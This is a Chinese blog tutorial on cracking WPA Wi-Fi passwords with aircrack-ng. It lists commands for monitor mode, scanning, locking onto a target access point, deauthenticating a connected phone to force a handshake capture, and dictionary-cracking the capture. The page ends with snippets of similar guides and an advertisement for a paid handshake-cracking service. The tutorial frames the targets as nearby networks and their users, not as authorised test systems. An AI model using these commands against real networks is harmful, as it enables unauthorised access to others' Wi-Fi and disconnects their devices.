aircack-ng抓握手包

1.关闭影响进程

airmon-ng check kill

将要进入监听模式的无线网卡断开它已连接的AP

2.查看无线网卡的名字

ifconfig ,例如 wlan0

3.进入监听模式:

airmon-ng start wlan0

  启动成功, ifconfig 后发现多了一个mon0

4.扫描附件wifi

airodump-ng mon0

  扫描后,终端显示为上下2个部分,按空格键可以启动/停止动态刷新, ‘a‘键可以调整显示视图,上下方向键可以选定一行方便查看。其中默认视图中,上半部分是扫描到的AP以及其属性,例如信号强度,通道,bssid,essid等,下半部分显示的是有哪些机器(对应于STATE栏,就是它mac)连接到这个AP(对应的就是ESSID)。

5.监听指定AP

  执行下列命令要停止扫描,及停止步骤4的命令,因为扫描会不断切换channel,而监听某个AP时,这个AP的channel是固定的。

   airodump-ng --bssid AP‘s mac -c channel -w capfile mon0

  --bssid:指定监听哪个AP(由AP’s mac指定)

  -c :指定这个AP的通道

-w:捕获的包存入文件capfile

  注意选定AP:

    1.步骤4下半部分的 BSSID和STATE要都存在一个mac,意思是探测到一个wifi的BSSID,并且这个wifi被一个或多个机器连接上(STATE栏指示其mac),步骤6解释为什么要这样选定。

6.强制重连,使握手包出现

   aireplay-ng -0 2 -a AP‘s bssid -c phone‘s mac mon0

         | |    |      |___连上这个wifi的手机的mac

         | |    |______________wifi的 BSSID

         | |______________________攻击次数

         |_________________________攻击方法

  攻击会导致手机和wifi断开连接。

  1.为什么要抓握手包?

    握手包里包含密码信息

  2.握手过程:

    假设是我的手机去连wifi,第一次肯定会要你输入密码。

      手机:我要连接你wifi

      wifi:你的密码

      手机:这是我的密码

      wifi:检查密码,正确,建立连接,错误,滚。

  对于一个已经过密码验证的手机和wifi,它们建立连接后交换的数据只不过是一些上网数据,抓它们没用,要抓就要抓包含密码的握手包,怎么让一个已验证过密码的连接再次出现握手包?最快的方法就是把手机踢下线,然后手机会自动重连,或者用手机的人发现手机断网了,他就会去连一下,这时握手包就出现了。这也就是为什么要选定一个有机器连接上的wifi来监听。

  不久就会在步骤5那个终端的第一行的末尾出现抓到握手包。若没出现,过几分钟重复攻击。

7.跑字典

  aircrack-ng  capfile.cap -w passwd.lst

时间: 2025-01-09 01:45:25

aircack-ng抓握手包的相关文章

抓握手包

Airmon-ng start wlan0 Airodump-ng mon0 Airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w mobi mon0-C参数是选择目标信道.如果该信道就目标一个AP使用的话不用加上--bssid,这个参数是为了跟精准的锁定目标~~ -w 是保存握手包的名字.获取后会在当前目录生成一个mobi-01.cap的握手包.这时就不用关闭这条shell而是另外打开一个shell Aireplay-ng -0 10 -a (AP的mac) -

如何获得WPA握手包&EWSA破解WPA密码教程[zz]

获得WPA\WPA2 握手包的方法有很多,下面介绍通过aircrack-ng工具包来载获握手数据包. 1.下载aircrack-ng工具包. 2.终端里输入 sudo airmon-ng start wlan0 启动数据监控模式. 3.终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA保存到以wpa命名的文件中了). 这时大家就可以看到要抓包的AP DATA为0 4.依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面

跑握手包/cap跑包等一系列服务 普通15元一包,跑出再收费/专业跑包,快速跑包

QQ:12065661   微信:Love1075621883 手机:15678251175/15678251135 邮件:[email protected] 网站:www.rt68.cn 我们是专业wifi密码破解团队 跑握手包/cap跑包等一系列服务 普通15元一包,跑出再收费/淘宝/拍拍交易 联系QQ:12065661  邮箱[email protected] 淘宝店:http://shop116438515.taobao.com/ 跑包规矩  跑出密码不得以任何借口不付款凡是同时发给多个

用Wireshark提取WPA握手包

进入正文前,先来看一张截图,如图1,使用“aircrack-ng wpa.cap -w password.lst”命令后,程序会提示输入待破解网络的序号,此时只要提供一个序号即可.注意:1:命令中不需要输入麻烦的ESSID:2:存在 一个非WPA加密的ESSID. 当你想把含有WPA握手包的CAP文件分享给别人的时候,你可能会发现CAP包是如此的巨大,实际上,对于aircrack-ng程序而言,CAP包中实际需要的信息可能还不超过10KB,如何将这些信息提取出来呢? 从CAP文件中提取WPA的握

如何获取握手包

最近看了很多关于无线网破解的东西,自己也亲自试验了很多,学到了很多的东西,所以就写了几篇经验教大家如何破解无线网,今天的经验就来和大家分享一下我最近总结的一些经验,如何使用CDLinux获取握手包. 工具/原料 CDLinux系统 方法/步骤 1.首先安装CDLinux系统,之前介绍过如何安装了,这里就不在多说了,直接进入主题. 提示:如果你没有外界网卡,那么最好使用U盘安装系统,如果有外接的那么就直接按在虚拟机中就OK了. 2.进入后里面有三款软件,找到里面的minidwep软件,打开,扫面目

Aircrack-ng 工具箱

官网为:http://www.aircrack-ng.org/, 它就是一个与WiFi 相关的工具啦,可以进行一些注入,抓包.破解WiFI等.里面有很多不同的套件. 另外,http://blog.csdn.net/qq_28208251/ 翻译了一部分官网上的内容,翻译的可以的,不错. 下面的知识可能有用: 1. 无线网卡可以工作在多种模式之下.常见的有Master,Managed,ad-hoc,monitor等模式.对于Master模式,它主要使用于无线接入点AP提供无线接入服务以及路由功能.

第一步:卸载手机上的“WIFI万能钥匙”! 会分享自己家的wifi

http://www.znds.com/tv-164866-1-1.html 楼主今日家中WIFI卡的不行,心想,20M的电信光纤没理由这么卡!于是就在网上查找了许多资料,接下来统一收集整理给大家!第一步:卸载手机上的“WIFI万能钥匙”!<ignore_js_op> 首先WIFI密码设置不要过于简单,例如纯数字,纯英文等!一旦安装有此软件,不管你怎么改WIFI密码,你也会一直被蹭网!不要以为这个软件有多么强大,其实这个软件是个实实在在的“流氓”软件,工作原理就是该软件会自动收集并且分享你家中

WPA-PSK无线网络破解原理及过程

本文将主要讲讲WPA-PSK类型的无线网络安全问题,首先我们看下802.11协议相关的基础知识. 802.11常见的几种认证方式: 1.不启用安全‍‍ ‍‍2.WEP‍‍ ‍‍3.WPA/WPA2-PSK(预共享密钥)‍‍ ‍‍4.WPA/WPA2 802.1X (radius认证) 具体在路由器的配置界面一般如下图所示: WPA-PSK的认证过程: 由于我这里主要分析wpa-psk类型的认证方式,所以这里就不讨论其他的认证方式了,通过抓包分析,我们可以看到wpa-psk的大致认证过程分为以下几

WPA-PSK无线网络破解原理及过程(转)

本文将主要讲讲WPA-PSK类型的无线网络安全问题,首先我们看下802.11协议相关的基础知识. 802.11常见的几种认证方式: 1.不启用安全‍‍ ‍‍2.WEP‍‍ ‍‍3.WPA/WPA2-PSK(预共享密钥)‍‍ ‍‍4.WPA/WPA2 802.1X (radius认证) 具体在路由器的配置界面一般如下图所示: WPA-PSK的认证过程: 由于我这里主要分析wpa-psk类型的认证方式,所以这里就不讨论其他的认证方式了,通过抓包分析,我们可以看到wpa-psk的大致认证过程分为以下几